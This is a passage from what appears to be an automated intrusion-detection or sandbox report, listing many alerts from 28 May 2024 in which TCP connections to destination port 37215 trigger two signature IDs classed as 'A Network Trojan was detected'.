            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.408809
            SID:2829579
            Source Port:59206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052377
            SID:2829579
            Source Port:51204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.852708
            SID:2829579
            Source Port:47266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899566
            SID:2835222
            Source Port:53246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.955863
            SID:2829579
            Source Port:45428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423357
            SID:2835222
            Source Port:56544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793495
            SID:2835222
            Source Port:42286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.506610
            SID:2835222
            Source Port:33426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679788
            SID:2829579
            Source Port:45194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737753
            SID:2829579
            Source Port:53968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371550
            SID:2835222
            Source Port:50858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.387490
            SID:2835222
            Source Port:42504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862951
            SID:2829579
            Source Port:45494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.771229
            SID:2829579
            Source Port:45732
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.437039
            SID:2829579
            Source Port:46210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.988535
            SID:2829579
            Source Port:47218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894154
            SID:2829579
            Source Port:58112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010585
            SID:2829579
            Source Port:54256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985950
            SID:2829579
            Source Port:56530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734896
            SID:2835222
            Source Port:43030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930118
            SID:2829579
            Source Port:54748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748523
            SID:2829579
            Source Port:52064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745442
            SID:2835222
            Source Port:54102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.487734
            SID:2835222
            Source Port:48022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870255
            SID:2835222
            Source Port:42308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.060936
            SID:2829579
            Source Port:34424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920283
            SID:2835222
            Source Port:42050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818705
            SID:2835222
            Source Port:46228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.899657
            SID:2835222
            Source Port:36406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893347
            SID:2835222
            Source Port:52690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002430
            SID:2829579
            Source Port:43034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.320994
            SID:2835222
            Source Port:44788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537058
            SID:2829579
            Source Port:46550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.323107
            SID:2829579
            Source Port:59440
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568740
            SID:2835222
            Source Port:35478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923441
            SID:2829579
            Source Port:52772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923036
            SID:2835222
            Source Port:51534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754925
            SID:2835222
            Source Port:32884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.806027
            SID:2829579
            Source Port:59744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951280
            SID:2829579
            Source Port:46192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854631
            SID:2829579
            Source Port:53134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.470081
            SID:2835222
            Source Port:54690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935329
            SID:2829579
            Source Port:38688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735475
            SID:2835222
            Source Port:48516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.969361
            SID:2829579
            Source Port:43914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.927532
            SID:2835222
            Source Port:51824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910869
            SID:2835222
            Source Port:39304
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.711326
            SID:2829579
            Source Port:51998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.723564
            SID:2829579
            Source Port:59280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064115
            SID:2835222
            Source Port:58894
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.732859
            SID:2829579
            Source Port:34766
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533136
            SID:2835222
            Source Port:60860
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.762075
            SID:2829579
            Source Port:35392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766989
            SID:2835222
            Source Port:42838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936033
            SID:2835222
            Source Port:43356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918467
            SID:2829579
            Source Port:34218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808974
            SID:2835222
            Source Port:33138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870517
            SID:2829579
            Source Port:34806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730725
            SID:2829579
            Source Port:46026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.006633
            SID:2835222
            Source Port:34078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.913835
            SID:2829579
            Source Port:46806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.030050
            SID:2829579
            Source Port:41978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.381463
            SID:2835222
            Source Port:59624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.433513
            SID:2835222
            Source Port:51788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313124
            SID:2829579
            Source Port:42554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.424038
            SID:2835222
            Source Port:37956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994256
            SID:2829579
            Source Port:54110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.846964
            SID:2835222
            Source Port:35544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.830475
            SID:2829579
            Source Port:40006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612678
            SID:2835222
            Source Port:33776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277970
            SID:2829579
            Source Port:35058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.696827
            SID:2835222
            Source Port:56964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.888759
            SID:2835222
            Source Port:35754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.029366
            SID:2829579
            Source Port:42630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811479
            SID:2835222
            Source Port:39618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967059
            SID:2835222
            Source Port:35456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012440
            SID:2829579
            Source Port:43106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459496
            SID:2829579
            Source Port:59014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.853351
            SID:2829579
            Source Port:37254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.717116
            SID:2829579
            Source Port:58056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.997642
            SID:2829579
            Source Port:58768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604968
            SID:2835222
            Source Port:46676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765261
            SID:2835222
            Source Port:55684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.553216
            SID:2829579
            Source Port:51958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815718
            SID:2835222
            Source Port:41004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003868
            SID:2829579
            Source Port:39086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.854739
            SID:2835222
            Source Port:51776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880400
            SID:2835222
            Source Port:57966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057331
            SID:2829579
            Source Port:50264
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611465
            SID:2835222
            Source Port:57270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957034
            SID:2835222
            Source Port:55750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541647
            SID:2829579
            Source Port:44038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773191
            SID:2835222
            Source Port:47802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.902738
            SID:2829579
            Source Port:38574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002912
            SID:2829579
            Source Port:37696
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.842764
            SID:2829579
            Source Port:56048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.929307
            SID:2829579
            Source Port:35910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.782542
            SID:2835222
            Source Port:42164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759567
            SID:2835222
            Source Port:37476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.885154
            SID:2835222
            Source Port:48780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069383
            SID:2835222
            Source Port:34900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934282
            SID:2835222
            Source Port:41660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542059
            SID:2829579
            Source Port:58570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552857
            SID:2835222
            Source Port:37938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.937064
            SID:2835222
            Source Port:40468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870164
            SID:2835222
            Source Port:49892
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045494
            SID:2829579
            Source Port:49898
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.485917
            SID:2829579
            Source Port:34164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065217
            SID:2835222
            Source Port:45172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031624
            SID:2835222
            Source Port:50102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.810157
            SID:2835222
            Source Port:54288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892364
            SID:2829579
            Source Port:43116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.299147
            SID:2829579
            Source Port:48328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804413
            SID:2829579
            Source Port:35230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031370
            SID:2829579
            Source Port:35172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748375
            SID:2835222
            Source Port:36032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.948843
            SID:2829579
            Source Port:45704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877684
            SID:2829579
            Source Port:37694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.925531
            SID:2829579
            Source Port:59032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533406
            SID:2829579
            Source Port:41690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772732
            SID:2835222
            Source Port:33756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.516008
            SID:2835222
            Source Port:39998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851297
            SID:2829579
            Source Port:44776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.679706
            SID:2829579
            Source Port:47886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421589
            SID:2835222
            Source Port:38826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290711
            SID:2829579
            Source Port:41952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.559769
            SID:2829579
            Source Port:36172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423381
            SID:2835222
            Source Port:45230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.714597
            SID:2829579
            Source Port:44714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.923559
            SID:2829579
            Source Port:53776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.015395
            SID:2829579
            Source Port:36306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.303230
            SID:2835222
            Source Port:36118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.073282
            SID:2835222
            Source Port:48970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333241
            SID:2835222
            Source Port:52888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.941177
            SID:2835222
            Source Port:49314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.804390
            SID:2829579
            Source Port:37496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400019
            SID:2829579
            Source Port:48418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.052932
            SID:2829579
            Source Port:34260
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745056
            SID:2829579
            Source Port:60544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510945
            SID:2835222
            Source Port:50178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.559135
            SID:2835222
            Source Port:38426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943398
            SID:2835222
            Source Port:36776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862049
            SID:2829579
            Source Port:58210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953882
            SID:2835222
            Source Port:48110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923520
            SID:2829579
            Source Port:52772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.950920
            SID:2835222
            Source Port:36862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.875818
            SID:2829579
            Source Port:53976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955675
            SID:2835222
            Source Port:45968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.734283
            SID:2835222
            Source Port:44242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.004460
            SID:2835222
            Source Port:51480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.816102
            SID:2829579
            Source Port:39614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031563
            SID:2829579
            Source Port:49620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777682
            SID:2829579
            Source Port:60334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.938983
            SID:2835222
            Source Port:34858
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516662
            SID:2835222
            Source Port:46038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046198
            SID:2829579
            Source Port:51378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.078004
            SID:2829579
            Source Port:36926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.844961
            SID:2829579
            Source Port:60006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756773
            SID:2835222
            Source Port:34326
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871407
            SID:2835222
            Source Port:55550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065826
            SID:2829579
            Source Port:47116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.540066
            SID:2835222
            Source Port:49800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.000613
            SID:2835222
            Source Port:55456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.306186
            SID:2835222
            Source Port:46648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.368124
            SID:2829579
            Source Port:38186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821599
            SID:2835222
            Source Port:55184
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052573
            SID:2829579
            Source Port:43854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.942983
            SID:2829579
            Source Port:51800
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.768157
            SID:2835222
            Source Port:48054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.068542
            SID:2829579
            Source Port:33810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.701859
            SID:2829579
            Source Port:52076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.664037
            SID:2835222
            Source Port:59742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046936
            SID:2835222
            Source Port:39926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.597428
            SID:2835222
            Source Port:43354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.572593
            SID:2835222
            Source Port:47388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842005
            SID:2835222
            Source Port:57402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435597
            SID:2835222
            Source Port:53920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.833534
            SID:2835222
            Source Port:57712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810949
            SID:2829579
            Source Port:43712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922161
            SID:2829579
            Source Port:50972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.659769
            SID:2829579
            Source Port:37642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310909
            SID:2835222
            Source Port:39212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995433
            SID:2835222
            Source Port:60004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.833889
            SID:2829579
            Source Port:41784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326536
            SID:2835222
            Source Port:59468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280854
            SID:2829579
            Source Port:58868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556458
            SID:2829579
            Source Port:47884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793478
            SID:2835222
            Source Port:48710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777610
            SID:2835222
            Source Port:39324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893094
            SID:2835222
            Source Port:53826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.300052
            SID:2829579
            Source Port:42798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.744139
            SID:2835222
            Source Port:50022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805714
            SID:2835222
            Source Port:36442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.949015
            SID:2835222
            Source Port:42612
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757388
            SID:2829579
            Source Port:41518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669025
            SID:2835222
            Source Port:54862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344164
            SID:2829579
            Source Port:38042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
